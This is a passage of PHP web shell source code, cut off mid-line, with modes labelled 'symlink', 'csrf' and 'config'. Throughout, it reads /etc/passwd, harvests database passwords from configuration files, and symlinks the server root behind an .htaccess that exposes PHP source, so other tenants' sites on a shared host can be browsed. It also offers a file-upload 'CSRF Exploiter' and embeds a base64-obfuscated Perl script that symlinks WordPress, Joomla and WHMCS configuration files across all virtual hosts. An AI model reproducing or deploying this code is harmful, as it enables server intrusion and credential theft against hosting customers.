  1693. {
  1694.  
  1695. //Other
  1696.  
  1697. $db=entre2v2($uxl,"dbpass = \"","\";");
  1698. if(!empty($db))
  1699. $pass=$db."\n";
  1700. fwrite($ffile,$pass);
  1701. }
  1702.  
  1703.  
  1704. }
  1705. }
  1706. echo "<center>
  1707. <a href=\"mct_symconf/root/\">Root Server</a>
  1708. <br><a href=\"mct_symconf/Passwords.txt\">Passwords</a>
  1709. <br><a href=\"mct_symconf/\">Configurations</a></center>";
  1710. }
  1711. else
  1712. {
  1713. echo "<center>
  1714. <form method=\"POST\">
  1715. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
  1716. $file = '/etc/passwd';
  1717. $read = @fopen($file, 'r');
  1718. if ($read){
  1719. $body = @fread($read, @filesize($file));
  1720. echo "".htmlentities($body)."";
  1721. }
  1722. elseif(!$read)
  1723. {
  1724. $read = @show_source($file) ;
  1725. }
  1726. elseif(!$read)
  1727. {
  1728. $read = @highlight_file($file);
  1729. }
  1730. elseif(!$read)
  1731. {
  1732. for($uid=0;$uid<1000;$uid++)
  1733. {
  1734. $ara = posix_getpwuid($uid);
  1735. if (!empty($ara))
  1736. {
  1737. while (list ($key, $val) = each($ara))
  1738. {
  1739. print "$val:";
  1740. }
  1741. print "\n";
  1742. }}}
  1743.  
  1744. flush();
  1745.  
  1746. echo "</textarea>
  1747. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
  1748. </form></center>";
  1749. }
  1750. }
  1751. }
  1752. elseif($_GET['do'] == 'symlink') {
  1753. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1754. $d0mains = @file("/etc/named.conf");
  1755. ##httaces
  1756. if($d0mains){
  1757. @mkdir("mct_sym",0777);
  1758. @chdir("mct_sym");
  1759. @exe("ln -s / root");
  1760. $file3 = 'Options Indexes FollowSymLinks
  1761. DirectoryIndex z.htm
  1762. AddType text/plain .php
  1763. AddHandler text/plain .php
  1764. Satisfy Any';
  1765. $fp3 = fopen('.htaccess','w');
  1766. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1767. echo "
  1768. <table align=center border=1 style='width:80%;border-color:lime;'>
  1769. <tr>
  1770. <td align=center><font size=2>S. No.</font></td>
  1771. <td align=center><font size=2>Domains</font></td>
  1772. <td align=center><font size=2>Users</font></td>
  1773. <td align=center><font size=2>Symlink</font></td>
  1774. </tr>";
  1775. $dcount = 1;
  1776. foreach($d0mains as $d0main){
  1777. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1778. flush();
  1779. if(strlen(trim($domains[1][0])) > 2){
  1780. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  1781. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  1782. <td align=left><a href=https://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  1783. <td>".$user['name']."</td>
  1784. <td><a href='$full/mct_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  1785. flush();
  1786. $dcount++;}}}
  1787. echo "</table>";
  1788. }else{
  1789. $TEST=@file('/etc/passwd');
  1790. if ($TEST){
  1791. @mkdir("mct_sym",0777);
  1792. @chdir("mct_sym");
  1793. exe("ln -s / root");
  1794. $file3 = 'Options Indexes FollowSymLinks
  1795. DirectoryIndex z.htm
  1796. AddType text/plain .php
  1797. AddHandler text/plain .php
  1798. Satisfy Any';
  1799. $fp3 = fopen('.htaccess','w');
  1800. $fw3 = fwrite($fp3,$file3);
  1801. @fclose($fp3);
  1802. echo "
  1803. <table align=center border=1><tr>
  1804. <td align=center><font size=3>S. No.</font></td>
  1805. <td align=center><font size=3>Users</font></td>
  1806. <td align=center><font size=3>Symlink</font></td></tr>";
  1807. $dcount = 1;
  1808. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  1809. while(!feof($file)){
  1810. $s = fgets($file);
  1811. $matches = array();
  1812. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1813. $matches = str_replace("home/","",$matches[1]);
  1814. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1815. continue;
  1816. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1817. <td align=center><font class=txt>" . $matches . "</td>";
  1818. echo "<td align=center><font class=txt><a href=$full/mct_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1819. $dcount++;}fclose($file);
  1820. echo "</table>";}else{if($os != "Windows"){@mkdir("mct_sym",0777);@chdir("mct_sym");@exe("ln -s / root");$file3 = '
  1821. Options Indexes FollowSymLinks
  1822. DirectoryIndex z.htm
  1823. AddType text/plain .php
  1824. AddHandler text/plain .php
  1825. Satisfy Any
  1826. ';
  1827. $fp3 = fopen('.htaccess','w');
  1828. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1829. echo "
  1830. <div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>Human Symlink</div>
  1831. <div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>
  1832. <table class='human' align=center border=1><tr>
  1833. <td align=center><font size=4>ID</font></td>
  1834. <td align=center><font size=4>Users</font></td>
  1835. <td align=center><font size=4>Symlink</font></td></tr>";
  1836. $temp = "";$val1 = 0;$val2 = 1000;
  1837. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  1838. if ($uid)$temp .= join(':',$uid)."\n";}
  1839. echo '<br/>';$temp = trim($temp);$file5 =
  1840. fopen("test.txt","w");
  1841. fputs($file5,$temp);
  1842. fclose($file5);$dcount = 1;$file =
  1843. fopen("test.txt", "r") or exit("Unable to open file!");
  1844. while(!feof($file)){$s = fgets($file);$matches = array();
  1845. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  1846. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1847. continue;
  1848. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1849. <td align=center><font class=txt>" . $matches . "</td>";
  1850. echo "<td align=center><font class=txt><a href=$full/mct_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1851. $dcount++;}
  1852. fclose($file);
  1853. echo "</table></div></center>";unlink("test.txt");
  1854. } else
  1855. echo "<center><font size=3>Cannot create Symlink</font></center>";
  1856. }
  1857. }
  1858. }
  1859. elseif($_GET['do'] == 'csrf') {
  1860. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'> [+] CSRF Exploiter Online [+]</div>";
  1861. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  1862. echo "<center>
  1863. <form method='post'>
  1864. URL: &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' name='url' size='50' height='10' placeholder='https://127.0.0.1/[path]/upload.php' style='margin: 5px auto; padding-left: 5px;' required><br>
  1865. POST File: <input type='text' name='data' style='border:0;border-bottom:1px solid #292929; width:500px;' size='50' height='10' placeholder='Filedata / files[] / qqfile / userfile / dll' style='margin: 5px auto; padding-left: 5px;' required><br>
  1866. <br><input style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' class='kotak' type='submit' name='go' value='Lock!'>
  1867. </form></table>";
  1868. $url = $_POST['url'];
  1869. $data = $_POST['data'];
  1870. $submit = $_POST['go'];
  1871. if($submit) {
  1872. echo "<br><form style='text-align:left' method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$data'><input style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' type='submit' name='ok' class='kotak' value='Upload'>
  1873. </form></div>";
  1874. }
  1875. ;} elseif($_GET['do'] == 'config') {
  1876. $mct = mkdir("mct_config", 0777);
  1877. $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
  1878. $htc = fopen("mct_config/.htaccess","w");
  1879. fwrite($htc, $isi_htc);
  1880. fclose($htc);
  1881. if(preg_match("/vhosts|vhost/", $dir)) {
  1882. $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1883. $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHB